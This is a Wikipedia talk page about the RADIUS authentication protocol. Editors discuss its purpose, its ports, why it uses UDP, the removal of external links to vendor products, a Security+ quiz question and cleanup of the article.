Talk:RADIUS

Latest comment: 5 years ago by Mortense in topic Capitalisation

"RADIUS" is a name of protocol, not software

edit

"RADIUS" is not a name of software. "RADIUS" is a name of protocol defined by RFC 2865 and 2866.--Sgk 11:18, Apr 13, 2004 (UTC)

What is RADIUS?

edit

I don't clearly understand what Radius is. What is the advantage of RADIUS compared to the usual thing? Actually, what IS the usual thing. My wlan dsl router has RADIUS functionality - what does that mean? Will it be used on the connection router - ISP or on the connection homecomputer - router. thank you, --Abdull 18:36, 4 Apr 2005 (UTC)

RADIUS functionality built into the modem just means that it can act as a radius server on your network. This is an alternative to running it standalone on a server. RADIUS sits between your network applications and your accounting database, and provides structured operations for common authentication/authorization/accounting tasks. For instance, a CISCO phone switch can be used to bring in and route out phone calls through your network (copper or IP), and can be configured to act as a radius client to your radius server. The first step, authentication, checks the user is who they say they are. In the phone switch example this may be the user entering their PIN. The second step, authorization, checks if the have the right to access the service they have requested. The phone example would at this point check if the user had enough credit for a call to their dialed number, and if so, for how long. Once the session is in progress, optional accounting messages may be sent periodically to update the server on the session's progress. Finally, the radius client will send through a stop message when the session has ended (eg. the user hangs up their phone or runs out of credit). A typical setup would also include a a network layer service such as ChilliSpot to assign IPs and forward their web traffic to the login page where where they enter their PIN, a web server to server these pages, and an accounting database to store the PINs and the amount of credit on them.
So if you wanted to charge users for access to your public wireless hotspot, then this kind of router could act as a convenient (if not quick and dirty) building block in your architecture.
Straussian 15:07, 2 December 2007 (UTC)Reply
I would like to see a comparison of Radius and Kerberos in the article. I don't get why there are two of them? 195.70.32.136 13:08, 2 January 2007 (UTC)Reply

What is RADIUS? Answer

edit

RADIUS is the common internet protocol to do authentication and accounting and use for: DSL, VOIP, Dial-up, Hotspots/Wifi, WiMAX, GPRS/UMTS in Mobile. It is a centralized server for all internet networks.

Maybe an example would help. If you have a server on a LAN and a remote access server (modem pool) that you can dial into; software running on the server supporting the radius protocol would allow you to use your server login account information when negotiating across PPP.

The alternative is that the remote access server would have a seperate list of PPP authorized users.

Radius allows you to maintain a single list of accounts for multiple such devices. A worthy goal.

In this example both the server and the remote access server would need to "speak" radius of course. Ijeffsc 07:15, 26 October 2006 (UTC)Reply

This is from the radius article
RADIUS uses UDP ports 1812 or 1645 for Authentication and 1813 or 1646 for Accounting. For example, Microsoft RADIUS servers default to the higher ports but Cisco devices default to the lower ports. Funk software's RADIUS servers also defaults to the lower ports.
Now, does anyone get the impression that radius don't do authorization from above two statements, Ijeffsc's and above two lines. On the other hard, this is what I see from searching services running on a fedora box
radius-dynauth 3799/tcp # RADIUS Dynamic Authorization
radius-dynauth 3799/udp # RADIUS Dynamic Authorization
Personally, I am not sure radius do authorization. I have been looking at a way of doing it with radiator without success. They seem to advice to run tacacs+ within radius, a really wierld setup.
Actually, Radius does do authorization. Its just that authorization information are carried by the same packet that does authentication, ie authorization use the same packet as authentication —The preceding unsigned comment was added by 62.128.166.251 (talk) 07:59, 23 January 2007 (UTC).Reply
edit

I've removed most of the external links, as they're just links to individual software packages. sjorford →•← 15:35, 15 Apr 2005 (UTC)

...and again. And I will continue to keep removing all these unecessary external links until and unless someone can convince me otherwise on the talk page. Edit summaries like "do not edit" just don't cut it, I'm afraid. sjorford →•← 21:33, 20 Apr 2005 (UTC)

edit

The extenal links were there for ages...It is important to link the best RADIUS servers on the market, example IAS for Microsoft, FreeRADIUS and other. This is important due to the fact that when you search Google about 'radius server' this page is in a high position and shold list/talk about RADIUS solutions.

Change the name to Radius Servers.

Why is it important? Wikipedia is an encyclopedia. That means we have an article explaining what RADIUS is, how it works with other technologies and so on. But we're not a shopping catalogue or a review of individual products. The high Google ranking for the page shouldn't affect the content at all.
I've no objection to external links, but they have to add something that enhances the encyclopedia article. I've left one link in because it has extra information in about radius servers in general, but the other links don't have that as far as I can see, they just act as advertising. sjorford →•← 08:43, 23 Apr 2005 (UTC)
RADIUS Servers are only one half of the solution. It's better to describe the protocol than just one endpoint.  kgrr talk 17:27, 15 April 2009 (UTC)Reply

Proposal

edit

Instead of fighting, why don't we put the list of RADIUS software on a separate page, like List_of_GIS_software ? Then both can be happy. bluezy

I like this proposal. Lists of things are meant to be self-organizing through categories.  kgrr talk 17:26, 15 April 2009 (UTC)Reply

IP Protocol table

edit

Why is this article using the TCP/IP protocol model? Virtually every discussion about networking uses the OSI model. Using a nonstandard model to disccus which layer RADIUS operates at just adds confusion. — Preceding unsigned comment added by Edtrob (talkcontribs) 01:26, 29 October 2014 (UTC)Reply

Why is there a table of IP protocols on the right hand part of this article? What does a list of IP Protocols have to do with RADIUS?

It's an application layer protocol.  kgrr talk 17:16, 15 April 2009 (UTC)Reply

RADIUS Question

edit

I'm taking a Security+ class right now and one of the questions in our book is this:

Which of the following cannot be used as a RADIUS client?
A) VPN server
B) Wireless access point
C) Network access server
D) Windows workstation

Now, the answer according to the book is D) Windows workstation, which we all agreed with. However, we don't know why. Any input would be nice. camknows

If your windows workstation had a GINA module that acted as a RADIUS client the answer could be all of the above. WaffleMonster (talk) 05:56, 15 December 2007 (UTC)Reply

Things like this actually do exist and are used for some applications such as guest networks and cyber cafes.

Cyber cafes do it in one of two ways: 1) A centralized NAS server or 2) A NAS server at the venue that may optionally interface to hotel billing, cash register, or other point of sale equipment. But a RADIUS client is not implemented in the laptop or workstation in this case.  kgrr talk

Wireless section?

edit

Is it just me, or does the following not make sense:

Although RADIUS was not initially intended to be a wireless security authentication method, it improves the WEP encryption key standard, in conjunction with other security methods such as EAP-PEAP.

RADIUS does not "improve" on WEP; although auth credentials can be transmitted from the NAS/AP to the auth server using RADIUS, the underlying WEP security is still as vulnerable as it otherwise would be.

Can we delete?

Evilal 00:10, 9 June 2007 (UTC)Reply

Question - why UDP?

edit

It's always baffled me why RADIUS uses UDP and not TCP. UDP seems much better suited for streaming applications where the loss of a few packets is tolerable. A perfect example is streaming live video. But as a developer I can't see how these principals apply to what we're trying to achieve with the RADIUS protocol. Surely the overhead of TCP wouldn't have any scalability or performance issues on fast networks and modern hardware? Someone please enlighten me why they chose UDP for RADIUS. Straussian 15:26, 2 December 2007 (UTC)Reply

See section 2.4 of RFC 2865.  kgrr talk 17:19, 15 April 2009 (UTC)Reply

Why UDP? -- Answer

edit

RADIUS is designed to scale to large-scale deployments with dozens, maybe hundreds of BASs all talking occasionally to a couple of central servers. Given the underlying reliability of modern networks, the overhead of maintaining hundreds of open TCP connections would have been overkill. The alternative (open a connection each time a packet needs to be sent) would also have been inefficient (no point in performing a 3-way handshake for the sake of a single accounting update). On balance, UDP is probably the best choice.

Remember that RADIUS has built-in acknowledgement/retransmission mechanisms to cope with the occasional lost packet.

For a more flexible and robust protocol, see http://en.wikipedia.org/wiki/DIAMETER.

Evilal 08:52, 4 December 2007 (UTC)Reply

Another reason is that when RADIUS was designed, it was possible to implement a UDP stack in a single embedded chip, but a TCP stack was more complicated (read: more expensive). This seems rather silly now, but it was a real problem designing cheap devices back then.

You can still find the same reasoning in SIP-phones : although SIP can be used both over UDP and TCP, a lot of vendors only implement the UDP part.

--Bluezy (talk) 22:18, 4 December 2007 (UTC)Reply

Bulk Changes

edit

Commited some new text at the start to try and speak to what RADIUS is/does for those who don't have much knowledge of it and its associated soup of TLAs. Think it would be good to axe/move some of the existing text especially the paragraphs including and immediatly following 'Many networks services ('

Some ideas for new sections:

One focusing on each of the popular RADIUS auth protocols PAP,CHAP,MSCHAP,EAP..etc centralizing some scattered information.

A second on popular backend databases SQL, password files, LDAP..etc...in the spirit of whatever common practices there are for managing accounts.

Finally security focused protocol criticisms such as use of MD5/secret key lengths/"Just use IPSec" a security/mitigation section might be helpful.

WaffleMonster (talk) 08:33, 15 December 2007 (UTC)Reply

Some of these sections may have some merit. I will be bold and add them this week.  kgrr talk 17:20, 15 April 2009 (UTC)Reply

Cleanup

edit

Over the next few days, I will spend some time to cleanup this article. I am planning on adding three figures. One showing a block diagram of RADIUS in an enterprise where dialup, VPN and Wi-Fi all use the same RADIUS server, a typical protocol stack and a block diagram of a roaming scenario where there is a proxy RADIUS server communicating with a remote RADIUS server connected by a PKI tunnel. I also will add a section on tools used to trouble-shoot RADIUS.  kgrr talk 15:46, 15 April 2009 (UTC)Reply

AAA?

edit

I believe AAA is just a name of a working group, which is a legitimate TLA. For the rest TLA-technobabble should be avoided as culturally inappropriate for enlightened technicians, the effort to find and use real descriptive terms instead of obscurantisms is an indication of a technical maturity of the speaker. In my opinion, that is. Rursus dixit. (mbork3!) 08:55, 13 January 2012 (UTC)Reply

You can find an explanation in the introduction part. Killer queen1 (talk) 21:45, 16 January 2012 (UTC)Reply

AAA - Section refers to NAS and RAS interchangeably

edit

The section on AAA using RADIUS refers to RAS as the requesting server initially, but then changes to NAS as the server being responded to, and then refers again to RAS. Are these interchangeable? — Preceding unsigned comment added by Anuragbatra (talkcontribs) 22:48, 11 May 2012 (UTC)Reply

Capitalisation

edit

Aren't there too many capitalised words in this article?

For example,

"Proxy Chaining", "Authentication, Authorization, and Accounting", "Access Reject", "Access Challenge", "Access Accept", and "RADIUS Codes".

--Mortense (talk) 11:06, 8 November 2019 (UTC)Reply